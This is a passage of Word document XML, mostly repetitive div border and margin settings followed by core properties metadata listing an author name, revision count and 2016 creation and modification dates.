        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1103036827">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="474568299">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="315915310">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="647904978">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2113622543">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="666522677">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="570967700">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="997809595">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1248230224">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="994383402">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1553231031">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1618565118">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2041667297">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="69430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Baer, Spencer S</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Spencer Baer</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <cp:lastPrinted>2016-03-06T22:50:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-04-28T15:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-04-28T21:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>